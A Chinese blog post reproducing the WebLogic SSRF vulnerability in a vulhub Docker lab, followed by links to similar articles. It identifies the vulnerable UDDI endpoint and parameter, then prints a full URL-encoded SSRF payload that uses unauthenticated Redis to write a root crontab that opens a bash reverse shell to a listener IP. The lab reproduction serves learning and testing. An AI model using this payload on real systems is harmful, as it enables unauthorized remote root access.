weblogic ssrf vulhub漏洞复现

最新推荐文章于 2024-03-11 22:44:59 发布
最新推荐文章于 2024-03-11 22:44:59 发布
阅读量479 收藏
点赞数
分类专栏: 渗透 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51143375/article/details/128168510
版权

进入vulhub下的weblogic ssrf路径下,启动容器docker-compose up -d

路径:/uddiexplorer/SearchPublicRegistries.jsp

输入数据然后提交,抓包

 漏洞存在处:operator=

 通过修改参数探测存活端口,404证明端口存在

探测端口不存在

可以通过爆破探测内网资产,但是本次用的vulhub,所以直接看下容器ip和服务,发现存在reids

docker inspect --format='{{.Name}} - {{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $(docker ps -aq)

 直接利用redis未授权访问反弹shell

 命令:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.31.133%2F5678%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

nc -lvvp开启监听,反弹成功

 

看到请叫我滚去戒烟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6460
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
vulhubweblogic ssrf漏洞复现
weixin_53730939的博客
03-19 625
vulhubweblogic ssrf漏洞复现(详解)
vulhub漏洞weblogic SSRF
weixin_45808483的博客
12-03 845
文接上回 vubhub漏洞weblogic RCE_ErYao7的博客-CSDN博客一开始只知道一个IP212.129.248.63使用nmap扫描开放的端口经过尝试我们发现 7001 端口是我们的要打的靶机漏洞使用 Xary 扫描xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html漏洞利用...https://blog.csdn.net/weixin_45808483/artic
[Vulhub] Weblogic SSRF 漏洞(CVE-2014-4210)
weixin_45605352的博客
07-21 5458
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
vulhub weblogic ssrf复现
Redredredfish的博客
12-22 342
VPS:x.x.x.x 跳板机debian:192.168.130.129 weblogic 内网ubuntu:192.168.130.132 redis 1、operator参数可以调用外部url,由于未做限制,造成ssrf,可以借助它探测服务器端口,如下两种不同的报错 http://192.168.130.129:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchk
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
weblogic cmd命令漏洞检测
04-08
进行安全测评时,复现漏洞是评估风险的关键步骤。这包括理解漏洞的工作原理、创建能触发漏洞的输入,以及观察漏洞被利用时的结果。通过这种方法,安全团队可以评估漏洞的实际影响,并为修复提供具体建议。 总的来说...
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
漏洞复现——vulhubSSRF漏洞
qq_52666132的博客
07-07 881
vulhubssrf漏洞复现
漏洞复现篇——利用vulhub模拟WeblogicSSRF漏洞
爱国小白帽
01-15 3183
SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
漏洞复现-vulhub复现WeblogicSSRF漏洞
sweetie 的博客
05-08 1458
模拟WeblogicSSRF漏洞实验: 1.打开搭建好vulhub的虚拟机,输入su切换到root用户 如果不切换,则会报下面的错 2、进入到vulhubweblogic/ssrf/用gedit打开靶场说明书README.md ls gedit README.md 3、使用docker-compose up -d命令打开靶场,复制网址http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 4、用ifconfig或ip addr
vulhubWeblogic SSRF漏洞复现
最新发布
yougexiaojiuguan的博客
03-11 1008
漏洞复现的记录
SSRF(服务器请求伪造)漏洞分析——pikachu-ssrf、vulhub-weblogic-ssrf靶场复现
qq_45612828的博客
08-06 3015
SSRF(服务器请求伪造)——pikachu-ssrf、vulhub-weblogic-ssrf靶场复现
渗透测试-----信息收集(概述、whois、子域名查询、爆破、vulhub域名传送漏洞复现、kali安装docker)
Pluto.的博客
12-14 689
文章目录渗透测试信息收集1. 概述2. 供练手的网站3. whois查询4. 子域名查询域传送漏洞1. 概述2. 解决办法3. vulhub漏洞复现4. 子域名爆破 渗透测试 信息收集 1. 概述 借助各种搜索引擎、工具等从获取相关数据,如谷歌、雅虎、MSN必应、百度等。收集的信息主要包括DNS服务器、路由关系、whois、数据库、电子邮件地址、电话号码、个人信息以及用户账户。收集的信息越多,渗透测试成功的概率越高。 2. 供练手的网站 http://testfire.net/ testfire.net
复现vulhub tomcat弱口令漏洞
m0_67463450的博客
02-17 290
本文简述了如何复现vulhub下tomcat管理后台存在弱口令漏洞
weblogic ssrf漏洞复现
qq_38415434的博客
08-07 319
采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。 使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞, cd /vulhub/weblogic/ssrf 创建漏洞环境 docker-compose up -d 查看容器 docker ps 虚拟机地...
vulhub weblogic ssrf复现
08-31
要在vulhub复现WebLogicSSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker和Docker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值